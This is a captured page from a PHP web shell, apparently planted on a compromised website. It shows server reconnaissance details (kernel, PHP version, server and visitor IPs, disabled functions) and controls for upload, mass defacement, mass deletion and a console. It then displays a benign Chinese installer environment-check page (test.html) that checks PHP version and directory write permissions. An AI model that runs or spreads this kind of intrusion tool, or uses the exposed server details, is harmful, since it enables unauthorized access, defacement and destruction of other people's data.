shell bypass 403

GrazzMean Shell

: /www/wwwroot/jc.chatgptzh.com/data/install/ [ drwxr-xr-x ]
Uname: Linux yisu-647059427c03a 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Software: nginx/1.22.1
PHP version: 7.3.31 [ PHP INFO ] PHP os: Linux
Server Ip: 103.146.158.90
Your Ip: 216.73.216.141
User: www (1000) | Group: www (1000)
Safe Mode: OFF
Disable Function:
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
upload mass deface mass delete console

name : test.html 
<!doctype html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>环境检测-W3School教程系统</title>
	<meta name="renderer" content="webkit|ie-comp|ie-stand">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"/>
    <meta http-equiv="Cache-Control" content="no-siteapp" />
    <link rel="stylesheet" href="/data/public/css/uikit.css" />
    <script src="/data/public/js/jquery.min.js" type="text/javascript"></script>
    <script src="/data/public/js/uikit.js"></script>
    <script src="/data/public/js/uikit-icons.js"></script>
<body>
	<style>
	.uK_title {
    position: absolute;
    top: 0;
    bottom: 0;
    left: 0;
    width: 100px;
    display: inline-flex;
    justify-content: center;
    align-items: center;
    color: #999;
        border-right: 1px solid #e5e5e5;
}
.uk-inputgb {
    padding: 0 0 0 110px;
}
.my-elem-quote {
    margin-bottom: 10px;
    margin-top: 10px;
    padding: 15px;
    line-height: 22px;
    border-left: 5px solid #1e87f0;
    border-radius: 0 2px 2px 0;
    background-color: #f2f2f2;
    font-style: initial;
    font-size: 0.9rem;
}
.page{
    padding-top:10px;

}
.page a{
    padding: 5px 8px;
    margin: 0 8px 8px 0;
    display: inline-block;
    background: #f1f1f1;
    color: #444;
    font-size: 12px;
    border-radius: 2px;
    text-decoration:none;

}
.my_soso {
    position: absolute;
    top: 0;
    bottom: 0;
    right: 10px;
    display: inline-flex;
    justify-content: center;
    align-items: center;
    color: #999;
}
.uk-button-small {
    padding: 0 5px;
    line-height: 20px;
    font-size: .575rem;
    border-radius: 50px;
}
.uk-navbar-container:not(.uk-navbar-transparent) {
 
    background: #1e87f0;
}
.uk-navbar-nav>li.uk-active>a {
    color: #fff;
}
.uk-navbar-nav>li>a {
    color: #fff;
 
}
.uk-navbar-nav>li>a:hover {
    color: #ffd;
 
}
.uk-navbar-nav>li>a:visited {
    color: #ffd;
 
}
</style>
</head>
<body>
	<div style="background: #1e87f0;">
		<div class="uk-container uk-container-xsmall">
		    <nav class="uk-navbar-container" uk-navbar style="position: relative; z-index: 980;">
		        <div class="uk-navbar-left">
		            <ul class="uk-navbar-nav">
		                <li><a>第一步</a></li>
                        <li><a style="color: #f7fb01;">第二步</a></li>
                        <li><a>第三步</a></li>
                        <li><a>第四步</a></li>
		            </ul>
		        </div>
		    </nav>
		</div>
	</div>
	<div class="uk-container uk-container-xsmall">
		<blockquote class="my-elem-quote">环境检测</blockquote>
		<div class="uk-child-width-1-2@s uk-child-width-1-1@m" uk-grid>
		    <div>
		        <div class="uk-card uk-card-default uk-card-body">
			    	<div class="p">
					<table class="uk-table uk-table-divider" lay-size="lg">
			             <colgroup>
			               <col width="150">
			               <col width="200">
			               <col>
			             </colgroup>
			             <thead>
			               <tr>
			                 <th>坏境</th>
			                 <th>最低配置</th>
			                 <th>当前配置</th>
			                 <th>是否符合</th>
			               </tr> 
			             </thead>
			             <tbody>
			               <tr>
			                    <td>操作系统</td>
			                    <td>不限</td>
			                    <td><?php echo php_uname('s'); ?></td>
			                    <td class="yes">√</td>
			               </tr>
			               <tr>
			                    <td>php版本</td>
			                    <td>&gt;5.6</td>
			                    <td><?php echo PHP_VERSION ?></td>
			                    <?php $php_version=explode('.', PHP_VERSION); ?>
			                    <td class="<?php if(($php_version['0']>=7) || ($php_version['0']>=5 && $php_version['1']>=3))echo 'yes'; ?>">
			                        <?php if (($php_version['0']>=7) || ($php_version['0']>=5 && $php_version['1']>=6)): ?>
			                            √
			                        <?php else: ?>
			                            ×
			                        <?php endif ?>
			                    </td>
			               </tr>
			                <tr>
			                    <td>./data/Uploads</td>
			                    <td>可写</td>
			                    <td>
			                        <?php if (is_writable('../uploads')): ?>
			                            可写
			                        <?php else: ?>
			                            不可写
			                        <?php endif ?>
			                    </td>
			                    <td class="<?php if(is_writable('../uploads'))echo 'yes'; ?>">
			                        <?php if (is_writable('../uploads')): ?>
			                            √
			                        <?php else: ?>
			                            ×
			                        <?php endif ?>
			                    </td>
			                </tr>
			                <tr>
			                    <td>./Runtime</td>
			                    <td>可写</td>
			                    <td>
			                        <?php if (is_writable('../../runtime')): ?>
			                            可写
			                        <?php else: ?>
			                            不可写
			                        <?php endif ?>
			                    </td>
			                    <td class="<?php if(is_writable('../../runtime'))echo 'yes'; ?>">
			                        <?php if (is_writable('../../runtime')): ?>
			                            √
			                        <?php else: ?>
			                            ×
			                        <?php endif ?>
			                    </td>
			                </tr>
			                <tr>
			                    <td>./data/install</td>
			                    <td>可写</td>
			                    <td>
			                        <?php if (is_writable('../install')): ?>
			                            可写
			                        <?php else: ?>
			                            不可写
			                        <?php endif ?>
			                    </td>
			                    <td class="<?php if(is_writable('../install'))echo 'yes'; ?>">
			                        <?php if (is_writable('../install')): ?>
			                            √
			                        <?php else: ?>
			                            ×
			                        <?php endif ?>
			                    </td>
			                </tr>
			                <tr>
			                    <td>./app</td>
			                    <td>可写</td>
			                    <td>
			                        <?php if (is_writable('../../app')): ?>
			                            可写
			                        <?php else: ?>
			                            不可写
			                        <?php endif ?>
			                    </td>
			                    <td class="<?php if(is_writable('../../app'))echo 'yes'; ?>">
			                        <?php if (is_writable('../../app')): ?>
			                            √
			                        <?php else: ?>
			                            ×
			                        <?php endif ?>
			                    </td>
			                </tr>
			             </tbody>
			           </table>
						<div class="uk-flex uk-flex-wrap uk-flex-wrap-around  ">
							<a href="/data/install/index.php" class="uk-button uk-button-default uk-width-1-2">返回上一步</a>
							<a onclick="testClick()" class="uk-width-1-2 update uk-button uk-button-primary">提交下一步</a>	 
						</div>
					</div>
				</div>
		    </div>
		</div>
		<br>
	</div>
<script>
function testClick(){
    if($('.yes').length!=6){
        alert('您的配置或权限不符合要求');
    }else{
        location.href='./index.php?c=create';
    }
}
</script>
</body>
</html>
© 2026 GrazzMean